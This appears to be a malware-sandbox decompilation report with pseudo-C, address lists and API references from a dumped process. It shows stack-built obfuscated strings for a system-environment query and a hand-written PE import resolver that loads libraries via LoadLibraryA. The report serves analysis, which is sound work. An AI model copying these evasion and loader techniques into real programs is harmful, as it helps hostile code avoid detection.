    					 *((short*)(_t161 - 0x20a)) = _t105;
    					_t106 = 0x20;
    					 *((short*)(_t161 - 0x208)) = _t106;
    					_t107 = 0x2a;
    					 *((short*)(_t161 - 0x206)) = _t107;
    					_t108 = 0x20;
    					 *((short*)(_t161 - 0x204)) = _t108;
    					_t109 = 0x46;
    					 *((short*)(_t161 - 0x202)) = _t109;
    					_t110 = 0x52;
    					 *((short*)(_t161 - 0x200)) = _t110;
    					_t111 = 0x4f;
    					 *((short*)(_t161 - 0x1fe)) = _t111;
    					_t112 = 0x4d;
    					 *((short*)(_t161 - 0x1fc)) = _t112;
    					_t113 = 0x20;
    					 *((short*)(_t161 - 0x1fa)) = _t113;
    					_t114 = 0x57;
    					_t157 = 0x69;
    					 *((short*)(_t161 - 0x1f8)) = _t114;
    					 *((short*)(_t161 - 0x1f6)) = _t157;
    					_t116 = 0x6e;
    					 *((short*)(_t161 - 0x1f4)) = _t116;
    					_t117 = 0x33;
    					 *((short*)(_t161 - 0x1f2)) = _t117;
    					_t118 = 0x32;
    					 *((short*)(_t161 - 0x1f0)) = _t118;
    					_t119 = 0x5f;
    					 *((short*)(_t161 - 0x1ee)) = _t119;
    					_t120 = 0x54;
    					 *((short*)(_t161 - 0x1ec)) = _t120;
    					 *((short*)(_t161 - 0x1ea)) = _t157;
    					_t122 = 0x6d;
    					 *((short*)(_t161 - 0x1e8)) = _t122;
    					 *((short*)(_t161 - 0x1e6)) = _t152;
    					_t124 = 0x5a;
    					 *((short*)(_t161 - 0x1e4)) = _t124;
    					_t125 = 0x6f;
    					 *((short*)(_t161 - 0x1e2)) = _t125;
    					_t126 = 0x6e;
    					 *((short*)(_t161 - 0x1e0)) = _t126;
    					 *((short*)(_t161 - 0x1de)) = _t152;
    					 *((short*)(_t161 - 0x1dc)) = 0;
    					 *(_t161 - 8) = E012C1195(_t155, _t157, _t159, 0x2000);
    					 *_t159(_t161 - 0x28);
    					_t132 = 0x44;
    					 *((short*)(_t161 - 0x1b8)) = _t132;
    					 *((short*)(_t161 - 0x1b6)) = _t152;
    					_t134 = 0x73;
    					 *((short*)(_t161 - 0x1b4)) = _t134;
    					_t135 = 0x63;
    					 *((short*)(_t161 - 0x1b2)) = _t135;
    					_t136 = 0x72;
    					 *((short*)(_t161 - 0x1b0)) = _t136;
    					 *((short*)(_t161 - 0x1ae)) = _t157;
    					_t138 = 0x70;
    					 *((short*)(_t161 - 0x1ac)) = _t138;
    					_t139 = 0x74;
    					 *((short*)(_t161 - 0x1aa)) = _t139;
    					_t140 = 0x6f;
    					 *((short*)(_t161 - 0x1a6)) = _t140;
    					_t141 = 0x6e;
    					 *((short*)(_t161 - 0x1a4)) = _t141;
    					 *((short*)(_t161 - 0x1a2)) = 0;
    					 *((short*)(_t161 - 0x1a8)) = _t157;
    					if(E012CD2FF(_t152,  *((intOrPtr*)(_t161 - 0xc)), _t159, _t161 - 0x214, _t161 - 0x1b8, _t161 - 0x28) != 0 &&  *((short*)(_t161 - 0x28)) == 8) {
    						E012C1604( *(_t161 - 8), 0xfff,  *((intOrPtr*)(_t161 - 0x20)));
    					}
    					_t147 = _t161 - 0x28;
    					_push(_t147);
    					_push(_t147);
    					E01356735();
    					_t156 =  *((intOrPtr*)(_t161 - 4));
    				}
    				_t95 = E012C1195(_t155, _t156, _t159, 0xfffe);
    				_t160 = _t95;
    				_push(_t160);
    				_push(0x7ffe);
    				_push(_t95);
    				_t96 = L01387B1C(_t95);
    				if(_t96 == 0) {
    					 *_t160 = _t96;
    				}
    				_push(_t161 - 0x7c);
    				_push(_t161 - 0x3c);
    				 *((char*)(_t161 - 0x7c)) = 0x47;
    				 *((char*)(_t161 - 0x7b)) = _t152;
    				 *((intOrPtr*)(_t161 - 0x7a)) = 0x73694474;
    				 *((short*)(_t161 - 0x76)) = 0x466b;
    				 *((char*)(_t161 - 0x74)) = 0x72;
    				 *((char*)(_t161 - 0x73)) = _t152;
    				 *((char*)(_t161 - 0x72)) = _t152;
    				 *((intOrPtr*)(_t161 - 0x71)) = 0x63617053;
    				 *((char*)(_t161 - 0x6d)) = _t152;
    				 *((intOrPtr*)(_t161 - 0x6c)) = 0x577845;
    				return E0132A5CA(_t161 - 0x3c);
    			}
    0x012d3ed8
    0x012d3ed8
    0x012d3ed8
    0x012d3ed8
    0x012d3eda
    0x012d3eea
    0x012d3eef
    0x012d3eef
    0x012d3ef6
    0x012d3efa
    0x012d3efe
    0x012d3f01
    0x012d3f08
    0x012d3f0e
    0x012d3f11
    0x012d3f18
    0x012d3f25
    0x012d3f2d
    0x012d3f3e
    0x012d3f43
    0x012d3f45
    0x012d3f45
    0x012d3f5c
    0x012d3f61
    0x012d3f63
    0x012d3f63
    0x012d3f6a
    0x012d3f72
    0x012d3f7a
    0x012d3f7d
    0x012d3f84
    0x012d3f87
    0x012d3f8e
    0x012d3f91
    0x012d3f98
    0x012d3f9b
    0x012d3fa2
    0x012d3fa5
    0x012d3fac
    0x012d3faf
    0x012d3fb6
    0x012d3fb9
    0x012d3fc0
    0x012d3fc3
    0x012d3fca
    0x012d3fcd
    0x012d3fd4
    0x012d3fd7
    0x012d3fde
    0x012d3fe1
    0x012d3fe8
    0x012d3feb
    0x012d3ff2
    0x012d3ff5
    0x012d3ffc
    0x012d3fff
    0x012d4006
    0x012d4009
    0x012d400c
    0x012d4015
    0x012d401c
    0x012d401f
    0x012d4026
    0x012d4029
    0x012d4030
    0x012d4033
    0x012d403a
    0x012d403d
    0x012d4044
    0x012d4045
    0x012d4050
    0x012d4057
    0x012d4058
    0x012d4063
    0x012d406a
    0x012d406d
    0x012d4074
    0x012d4075
    0x012d407e
    0x012d407f
    0x012d4088
    0x012d4096
    0x012d40a2
    0x012d40aa
    0x012d40ae
    0x012d40af
    0x012d40ba
    0x012d40c1
    0x012d40c4
    0x012d40cb
    0x012d40ce
    0x012d40d5
    0x012d40d6
    0x012d40e1
    0x012d40e8
    0x012d40eb
    0x012d40f2
    0x012d40f3
    0x012d40fc
    0x012d40fd
    0x012d4106
    0x012d4107
    0x012d4110
    0x012d4128
    0x012d413d
    0x012d4151
    0x012d4156
    0x012d4159
    0x012d415c
    0x012d415d
    0x012d415e
    0x012d4163
    0x012d4163
    0x012d416b
    0x012d4171
    0x012d4173
    0x012d4174
    0x012d4179
    0x012d417a
    0x012d4181
    0x012d4183
    0x012d4183
    0x012d4189
    0x012d418d
    0x012d418e
    0x012d4192
    0x012d4195
    0x012d419c
    0x012d41a2
    0x012d41a6
    0x012d41a9
    0x012d41ac
    0x012d41b3
    0x012d41b6
    0x012d41c2

    APIs
    • GetProcAddress.KERNEL32(00000000,?), ref: 012D3F25
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    APIs
    • GetProcAddress.KERNEL32(00000000,MessageBoxW,00000000,USER32.DLL,012E3288,00000314,00000000), ref: 012C8A13
    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 012C8A31
    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 012C8A41
    • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 012C8A51
    • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 012C8A65
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    C-Code - Quality: 62%
    			E012C261A(void* __edx, intOrPtr _a4) {
    				signed int _v8;
    				char _v9;
    				char _v508;
    				char _v512;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				signed int _t18;
    				void* _t22;
    				signed int _t23;
    				short _t29;
    				void* _t31;
    				void* _t33;
    				void* _t35;
    				void* _t37;
    				void* _t38;
    				void* _t39;
    				void* _t40;
    				char _t42;
    				void* _t43;
    				void* _t47;
    				void* _t53;
    				char _t55;
    				void* _t56;
    				intOrPtr _t59;
    				void* _t60;
    				void* _t61;
    				signed int _t63;
    				signed int _t65;
    				void* _t66;
    				void* _t68;
    
    				_t53 = __edx;
    				_t63 = _t65;
    				_t66 = _t65 - 0x1fc;
    				_t18 =  *0x12e2aa8; // 0x5ff9d198
    				_v8 = _t18 ^ _t63;
    				_t59 = _a4;
    				_t55 = E012C25F4(_t59);
    				_t42 = 0;
    				_v512 = _t55;
    				if(_t55 != 0) {
    					_t22 = E012C8B43(3);
    					_pop(_t47);
    					if(_t22 == 1) {
    						L16:
    						_push(0xfffffff4);
    						_push(_t47);
    						_t61 = E01304862(_t22, __eflags);
    						__eflags = _t61 - _t42;
    						if(_t61 != _t42) {
    							__eflags = _t61 - 0xffffffff;
    							if(_t61 != 0xffffffff) {
    								_t23 = 0;
    								__eflags = 0;
    								while(1) {
    									 *((char*)(_t63 + _t23 - 0x1f8)) =  *((intOrPtr*)(_t55 + _t23 * 2));
    									__eflags =  *((intOrPtr*)(_t55 + _t23 * 2)) - _t42;
    									if( *((intOrPtr*)(_t55 + _t23 * 2)) == _t42) {
    										break;
    									}
    									_t23 = _t23 + 1;
    									__eflags = _t23 - 0x1f4;
    									if(_t23 < 0x1f4) {
    										continue;
    									}
    									break;
    								}
    								_push(_t42);
    								_push( &_v512);
    								_v9 = _t42;
    								_push(E012C63C0( &_v508));
    								_push( &_v508);
    								_push(_t61);
    								return E01334EDA( &_v508, _t61);
    							}
    						}
    					} else {
    						_t20 = E012C8B43(3);
    						_pop(_t47);
    						if(_t20 != 0 ||  *0x12e2018 != 1) {
    							if(_t59 != 0xfc) {
    								_t29 = E012C1604(0x12e3288, 0x314, L"Runtime Error!\n\nProgram: ");
    								_t68 = _t66 + 0xc;
    								if(_t29 != 0) {
    									_push(_t42);
    									_push(_t42);
    									_push(_t42);
    									_push(_t42);
    									_push(_t42);
    									goto L9;
    								} else {
    									_push(0x104);
    									_t59 = 0x12e32ba;
    									_push(0x12e32ba);
    									_push(_t42);
    									 *0x12e34c2 = _t29;
    									_push(_t53);
    									_t39 = E0136600E(_t29, _t47);
    									_t42 = 0x2fb;
    									if(_t39 == 0) {
    										_t40 = E012C1604(0x12e32ba, 0x2fb, L"<program name unknown>");
    										_t68 = _t68 + 0xc;
    										if(_t40 != 0) {
    											L8:
    											_push(0);
    											_push(0);
    											_push(0);
    											_push(0);
    											_push(0);
    											L9:
    											E012C38BA(_t42, 0x12e3288, _t59);
    										}
    									}
    								}
    								_t31 = E012C8B28(_t59);
    								_pop(_t50);
    								if(_t31 + 1 > 0x3c) {
    									_t37 = 0x12e3244 + E012C8B28(_t59) * 2;
    									_t50 = _t37 - _t59 >> 1;
    									_t42 = _t42 - (_t37 - _t59 >> 1);
    									_t38 = E012C1667(_t37, _t42, L"...", 3);
    									_t68 = _t68 + 0x14;
    									if(_t38 != 0) {
    										goto L8;
    									}
    								}
    								_t59 = 0x314;
    								_t33 = E012C158F(0x12e3288, 0x314, L"\n\n");
    								_t68 = _t68 + 0xc;
    								if(_t33 != 0) {
    									goto L8;
    								}
    								_t35 = E012C158F(0x12e3288, 0x314, _v512);
    								_t68 = _t68 + 0xc;
    								if(_t35 != 0) {
    									goto L8;
    								}
    								_t20 = E012C89BC(_t50, 0x12e3288, L"Microsoft Visual C++ Runtime Library", 0x12010);
    							}
    						} else {
    							goto L16;
    						}
    					}
    				}
    				_pop(_t56);
    				_pop(_t60);
    				_pop(_t43);
    				return E012C8B82(_t20, _t43, _v8 ^ _t63, _t53, _t56, _t60);
    			}
    0x012c261a
    0x012c261d
    0x012c261f
    0x012c2625
    0x012c262c
    0x012c2631
    0x012c263b
    0x012c263d
    0x012c2640
    0x012c2648
    0x012c2650
    0x012c2655
    0x012c2659
    0x012c2766
    0x012c2766
    0x012c2768
    0x012c276e
    0x012c2770
    0x012c2772
    0x012c2774
    0x012c2777
    0x012c2779
    0x012c2779
    0x012c277b
    0x012c277e
    0x012c2785
    0x012c2789
    0x00000000
    0x00000000
    0x012c278b
    0x012c278c
    0x012c2791
    0x00000000
    0x00000000
    0x00000000
    0x012c2791
    0x012c2793
    0x012c279a
    0x012c27a2
    0x012c27ab
    0x012c27b2
    0x012c27b3
    0x00000000
    0x012c27b4
    0x012c2777
    0x012c265f
    0x012c2661
    0x012c2666
    0x012c2669
    0x012c267e
    0x012c2694
    0x012c2699
    0x012c269e
    0x012c275c
    0x012c275d
    0x012c275e
    0x012c275f
    0x012c2760
    0x00000000
    0x012c26a4
    0x012c26a4
    0x012c26a9
    0x012c26ae
    0x012c26af
    0x012c26b0
    0x012c26b6
    0x012c26b7
    0x012c26bc
    0x012c26c3
    0x012c26cc
    0x012c26d1
    0x012c26d6
    0x012c26d8
    0x012c26da
    0x012c26db
    0x012c26dc
    0x012c26dd
    0x012c26de
    0x012c26df
    0x012c26df
    0x012c26df
    0x012c26d6
    0x012c26c3
    0x012c26e5
    0x012c26eb
    0x012c26ef
    0x012c26f7
    0x012c2704
    0x012c270b
    0x012c270f
    0x012c2714
    0x012c2719
    0x00000000
    0x00000000
    0x012c2719
    0x012c2720
    0x012c2727
    0x012c272c
    0x012c2731
    0x00000000
    0x00000000
    0x012c273b
    0x012c2740
    0x012c2745
    0x00000000
    0x00000000
    0x012c2752
    0x012c2757
    0x00000000
    0x00000000
    0x00000000
    0x012c2669
    0x012c2659
    0x012c27bd
    0x012c27be
    0x012c27c1
    0x012c27c8

    APIs
    • _wcslen.LIBCMT ref: 012C26E5
    • _wcslen.LIBCMT ref: 012C26F2
      • Part of subcall function 012C89BC: GetProcAddress.KERNEL32(00000000,MessageBoxW,00000000,USER32.DLL,012E3288,00000314,00000000), ref: 012C8A13
      • Part of subcall function 012C89BC: GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 012C8A31
      • Part of subcall function 012C89BC: GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 012C8A41
      • Part of subcall function 012C89BC: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 012C8A51
      • Part of subcall function 012C89BC: GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 012C8A65
    • _strlen.LIBCMT ref: 012C27A5
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    C-Code - Quality: 87%
    			E012D8DA6(void* __ebx, signed int* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, intOrPtr _a24) {
    				short _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				char _v28;
    				intOrPtr _v32;
    				char _v40;
    				intOrPtr* _t99;
    				signed int _t106;
    				signed int _t107;
    				signed int _t114;
    				signed int _t115;
    				signed int _t116;
    				signed int _t122;
    				signed int _t124;
    				signed int _t127;
    				signed int _t128;
    				intOrPtr _t129;
    				void* _t137;
    				char* _t138;
    				signed int _t143;
    				signed int _t148;
    				signed int _t154;
    				void* _t155;
    				signed int _t157;
    				void* _t160;
    				char* _t164;
    				signed int _t178;
    				char _t182;
    				char _t183;
    				unsigned int _t186;
    				signed int _t191;
    				signed int _t199;
    				signed int _t200;
    				signed int* _t208;
    				signed int _t209;
    				signed int _t210;
    				intOrPtr _t211;
    				signed int _t212;
    				signed int _t213;
    				signed int _t214;
    
    				_t155 = __ebx;
    				_v24 = 0x3ff;
    				_v8 = 0x30;
    				E012C12FE(__ebx,  &_v40, _a24);
    				if(_a16 < 0) {
    					_a16 = 0;
    				}
    				_t210 = _a8;
    				if(_t210 != 0) {
    					__eflags = _a12;
    					if(_a12 <= 0) {
    						goto L3;
    					}
    					 *_t210 = 0;
    					__eflags = _a12 - _a16 + 0xb;
    					if(_a12 > _a16 + 0xb) {
    						_t208 = _a4;
    						_v16 =  *_t208;
    						_t106 = _t208[1];
    						_push(_t155);
    						_t168 = _t106 >> 0x00000014 & 0x000007ff;
    						__eflags = (_t106 >> 0x00000014 & 0x000007ff) - 0x7ff;
    						if((_t106 >> 0x00000014 & 0x000007ff) != 0x7ff) {
    							L22:
    							_t107 = _t106 & 0x80000000;
    							__eflags = _t107;
    							if(_t107 != 0) {
    								 *_t210 = 0x2d;
    								_t210 = _t210 + 1;
    								__eflags = _t210;
    							}
    							_t157 = _a20;
    							__eflags = _t157;
    							asm("sbb ebx, ebx");
    							 *_t210 = 0x30;
    							 *(_t210 + 1) = ((_t107 & 0xffffff00 | _t157 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
    							_t160 = ( ~_t157 & 0xffffffe0) + 0x27;
    							__eflags = _t208[1] & 0x7ff00000;
    							if((_t208[1] & 0x7ff00000) != 0) {
    								 *((char*)(_t210 + 2)) = 0x31;
    								_t212 = _t210 + 3;
    								__eflags = _t212;
    							} else {
    								 *((char*)(_t210 + 2)) = 0x30;
    								_t212 = _t210 + 3;
    								__eflags =  *_t208 | _t208[1] & 0x000fffff;
    								if(( *_t208 | _t208[1] & 0x000fffff) != 0) {
    									_v24 = 0x3fe;
    								} else {
    									_v24 = 0;
    								}
    							}
    							_t114 = _t212;
    							_t213 = _t212 + 1;
    							_a8 = _t114;
    							__eflags = _a16;
    							if(_a16 != 0) {
    								 *_t114 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v40 + 0xbc))))));
    							} else {
    								 *_t114 = 0;
    							}
    							_t115 =  *_t208;
    							_t178 = _t208[1] & 0x000fffff;
    							__eflags = _t178;
    							_v12 = _t178;
    							if(_t178 > 0) {
    								L34:
    								_v16 = 0;
    								_v12 = 0xf0000;
    								do {
    									__eflags = _a16;
    									if(_a16 <= 0) {
    										break;
    									}
    									_t143 = E012D9C60( *_t208 & _v16, _v8, _t208[1] & _v12 & 0x000fffff) + 0x00000030 & 0x0000ffff;
    									__eflags = _t143 - 0x39;
    									if(_t143 > 0x39) {
    										_t143 = _t143 + _t160;
    										__eflags = _t143;
    									}
    									_t186 = _v12;
    									_v8 = _v8 - 4;
    									 *_t213 = _t143;
    									_t213 = _t213 + 1;
    									_a16 = _a16 - 1;
    									__eflags = _v8;
    									_v16 = (_t186 << 0x00000020 | _v16) >> 4;
    									_v12 = _t186 >> 4;
    								} while (_v8 >= 0);
    								__eflags = _v8;
    								if(_v8 < 0) {
    									goto L50;
    								}
    								_t137 = E012D9C60( *_t208 & _v16, _v8, _t208[1] & _v12 & 0x000fffff);
    								__eflags = _t137 - 8;
    								if(_t137 <= 8) {
    									goto L50;
    								}
    								_t138 = _t213 - 1;
    								while(1) {
    									_t182 =  *_t138;
    									__eflags = _t182 - 0x66;
    									if(_t182 == 0x66) {
    										goto L44;
    									}
    									__eflags = _t182 - 0x46;
    									if(_t182 != 0x46) {
    										__eflags = _t138 - _a8;
    										if(_t138 == _a8) {
    											_t76 = _t138 - 1;
    											 *_t76 =  *(_t138 - 1) + 1;
    											__eflags =  *_t76;
    										} else {
    											_t183 =  *_t138;
    											__eflags = _t183 - 0x39;
    											if(_t183 != 0x39) {
    												 *_t138 = _t183 + 1;
    											} else {
    												 *_t138 = _t160 + 0x3a;
    											}
    										}
    										goto L50;
    									}
    									L44:
    									 *_t138 = 0x30;
    									_t138 = _t138 - 1;
    								}
    							} else {
    								__eflags = _t115;
    								if(_t115 <= 0) {
    									L50:
    									__eflags = _a16;
    									if(_a16 > 0) {
    										E012C8BA0(_t213, 0x30, _a16);
    										_t213 = _t213 + _a16;
    										__eflags = _t213;
    									}
    									_t116 = _a8;
    									__eflags =  *_t116;
    									if( *_t116 == 0) {
    										_t213 = _t116;
    									}
    									__eflags = _a20;
    									 *_t213 = ((_t116 & 0xffffff00 | _a20 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
    									_t199 = _t208[1];
    									_t122 = E012D9C60( *_t208, 0x34, _t199);
    									_t200 = _t199 & 0;
    									_t124 = (_t122 & 0x000007ff) - _v24;
    									__eflags = _t124;
    									_push(0);
    									_pop(0x3e8);
    									asm("sbb edx, ecx");
    									if(__eflags < 0) {
    										L58:
    										 *(_t213 + 1) = 0x2d;
    										_t214 = _t213 + 2;
    										__eflags = _t214;
    										_t124 =  ~_t124;
    										asm("adc edx, ebx");
    										_t200 =  ~_t200;
    										goto L59;
    									} else {
    										if(__eflags > 0) {
    											L57:
    											 *(_t213 + 1) = 0x2b;
    											_t214 = _t213 + 2;
    											L59:
    											_t209 = _t214;
    											 *_t214 = 0x30;
    											__eflags = _t200;
    											if(__eflags < 0) {
    												L63:
    												__eflags = _t200;
    												if(__eflags < 0) {
    													L67:
    													__eflags = _t214 - _t209;
    													if(_t214 != _t209) {
    														L71:
    														_push(0);
    														_push(0xa);
    														_push(_t200);
    														_push(_t124);
    														 *_t214 = E012D9B80() + 0x30;
    														_v20 = _t200;
    														_t214 = _t214 + 1;
    														__eflags = _t214;
    														_t124 = 0x3e8;
    														_v20 = 0;
    														L72:
    														_t127 = _t124 + 0x30;
    														__eflags = _t127;
    														 *_t214 = _t127;
    														 *(_t214 + 1) = 0;
    														L73:
    														__eflags = _v28;
    														if(_v28 != 0) {
    															_t129 = _v32;
    															_t96 = _t129 + 0x70;
    															 *_t96 =  *(_t129 + 0x70) & 0xfffffffd;
    															__eflags =  *_t96;
    														}
    														_t128 = 0;
    														__eflags = 0;
    														L76:
    														return _t128;
    													}
    													__eflags = _t200;
    													if(__eflags < 0) {
    														goto L72;
    													}
    													if(__eflags > 0) {
    														goto L71;
    													}
    													__eflags = _t124 - 0xa;
    													if(_t124 < 0xa) {
    														goto L72;
    													}
    													goto L71;
    												}
    												if(__eflags > 0) {
    													L66:
    													_push(0);
    													_push(0x64);
    													_push(_t200);
    													_push(_t124);
    													 *_t214 = E012D9B80() + 0x30;
    													_v20 = _t200;
    													_t214 = _t214 + 1;
    													__eflags = _t214;
    													_t124 = 0x3e8;
    													_t200 = 0;
    													goto L67;
    												}
    												__eflags = _t124 - 0x64;
    												if(_t124 < 0x64) {
    													goto L67;
    												}
    												goto L66;
    											}
    											if(__eflags > 0) {
    												L62:
    												_push(0);
    												_push(0x3e8);
    												_push(_t200);
    												_push(_t124);
    												 *_t214 = E012D9B80() + 0x30;
    												_t214 = _t214 + 1;
    												_v20 = _t200;
    												_t124 = 0x3e8;
    												_t200 = 0;
    												__eflags = _t214 - _t209;
    												if(_t214 != _t209) {
    													goto L66;
    												}
    												goto L63;
    											}
    											__eflags = _t124 - 0x3e8;
    											if(_t124 < 0x3e8) {
    												goto L63;
    											}
    											goto L62;
    										}
    										__eflags = _t124;
    										if(_t124 < 0) {
    											goto L58;
    										}
    										goto L57;
    									}
    								}
    								goto L34;
    							}
    						}
    						__eflags = 0;
    						if(0 != 0) {
    							goto L22;
    						}
    						_t148 = _a12;
    						__eflags = _t148 - 0xffffffff;
    						if(_t148 != 0xffffffff) {
    							_t149 = _t148 + 0xfffffffe;
    							__eflags = _t148 + 0xfffffffe;
    						} else {
    							_t149 = _t148;
    						}
    						_t164 = _t210 + 2;
    						_t128 = E012D8D86(_t208, _t164, _t149, _a16, 0);
    						__eflags = _t128;
    						if(_t128 == 0) {
    							__eflags =  *_t164 - 0x2d;
    							if( *_t164 == 0x2d) {
    								 *_t210 = 0x2d;
    								_t210 = _t210 + 1;
    								__eflags = _t210;
    							}
    							__eflags = _a20;
    							 *_t210 = 0x30;
    							 *(_t210 + 1) = ((_t128 & 0xffffff00 | _a20 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
    							_t154 = E012D94A0(_t168, _t210 + 2, 0x65);
    							_pop(_t191);
    							__eflags = _t154;
    							if(_t154 != 0) {
    								__eflags = _a20;
    								 *_t154 = ((_t191 & 0xffffff00 | _a20 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
    								 *((char*)(_t154 + 3)) = 0;
    							}
    							goto L73;
    						} else {
    							__eflags = _v28;
    							 *_t210 = 0;
    							if(_v28 != 0) {
    								 *(_v32 + 0x70) =  *(_v32 + 0x70) & 0xfffffffd;
    							}
    							goto L76;
    						}
    					} else {
						_t99 = E012C22A2();
						_push(0x22); // 0x22 = ERANGE: output buffer too small for the requested digits
						L4:
						_pop(_t211);
						 *_t99 = _t211; // errno written through the pointer E012C22A2 returns
						E012C390C();    // invalid-parameter handler; matches the CRT _errno() + _invalid_parameter pattern
						if(_v28 != 0) {
							 *(_v32 + 0x70) =  *(_v32 + 0x70) & 0xfffffffd;
						}
						return _t211;
					}
				}
				L3:
				_t99 = E012C22A2();
				_push(0x16); // 0x16 = EINVAL: NULL buffer or non-positive size
				goto L4;
			}

    • Statement addresses (the IDA plugin's per-statement address column for the listing above, in listing order, 0x00000000 where a statement has none): 0x012d8da6 to 0x012d9117

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    C-Code - Quality: 58%
    			E012D1BBE(intOrPtr _a4, _Unknown_base(*)()* _a8) {
    				_Unknown_base(*)()* _v8;
    				char _v12;
    				intOrPtr _v16;
    				char _v20;
    				char _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				char _v36;
    				short _v40;
    				short _v42;
    				short _v44;
    				short _v46;
    				short _v48;
    				short _v50;
    				short _v52;
    				short _v54;
    				char _v56;
    				void* __ebx;
    				short _t35;
    				short _t36;
    				short _t37;
    				short _t38;
    				short _t39;
    				short _t40;
    				short _t41;
    				short _t42;
    				_Unknown_base(*)()* _t45;
    				_Unknown_base(*)()* _t49;
    				signed short _t50;
    				CHAR* _t51;
    				CHAR* _t58;
    				struct HINSTANCE__* _t59;
    				intOrPtr _t60;
    				intOrPtr _t66;
    				signed short* _t68;
    
				// Stack-built strings (the decompiler shows them as constants):
				// _v56.._v40 is the wide string L"kernel32": 'k','e','r','n','e','l','3','2', NUL
				_t35 = 0x6b;
				_v56 = _t35;
				_t36 = 0x65;
				_v54 = _t36;
				_t37 = 0x72;
				_v52 = _t37;
				_t38 = 0x6e;
				_v50 = _t38;
				_t39 = 0x65;
				_v48 = _t39;
				_t40 = 0x6c;
				_v46 = _t40;
				_t41 = 0x33;
				_v44 = _t41;
				_t42 = 0x32;
				_v42 = _t42;
				_v40 = 0;
				_v24 = 0;
				// _a8 + 0x80: read as IMAGE_NT_HEADERS32 this is DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]
				// .VirtualAddress, i.e. the import table RVA; _a4 (added below) is the image base
				_t45 =  *(_a8 + 0x80);
				// _v20/_v16 = "kern" "el32": narrow "kernel32", NUL-terminated by _v12
				_v20 = 0x6e72656b;
				_v16 = 0x32336c65;
				_v12 = 0;
				// _v36/_v32/_v28 = "Load" "Libr" "aryA": "LoadLibraryA", NUL-terminated by _v24
				_v36 = 0x64616f4c;
				_v32 = 0x7262694c;
				_v28 = 0x41797261;
    				if(_t45 != 0) {
    					_t60 = _a4;
    					_t45 = _t45 + _t60;
    					_a8 = _t45;
    					if(_t45 != 0) {
						while(1) {
							// IMAGE_IMPORT_DESCRIPTOR walk: +0x10 is FirstThunk, zero ends the table
							_t66 =  *((intOrPtr*)(_t45 + 0x10));
							if(_t66 == 0) {
								break;
							}
							_t25 =  &_v36; // 0x64616f4c
							_t68 = _t66 + _t60; // IAT (FirstThunk RVA) + image base
							_t58 =  *((intOrPtr*)(_t45 + 0xc)) + _t60; // +0x0c is Name: the DLL name string
							// Resolve LoadLibraryA (API ref 012D1C79) from kernel32, then call it on the
							// DLL name; the argument lists are as the decompiler rendered them
							_t49 = GetProcAddress(E013208F1( &_v56, _t58, _t60), _t58);
							_v8 = _t49;
							_t45 =  *_t49(_t58,  &_v56, _t25);
							_t59 = _t45;
							if(_t59 == 0) {
								L14:
								_t33 =  &_a8;
								 *_t33 = _a8 + 0x14; // next descriptor: sizeof(IMAGE_IMPORT_DESCRIPTOR) == 0x14
								if( *_t33 != 0) {
									_t60 = _a4;
									_t45 = _a8;
									continue;
								}
								break;
							}
							while( *_t68 != 0) {
								_t50 =  *_t68;
								if(_t50 >= 0) {
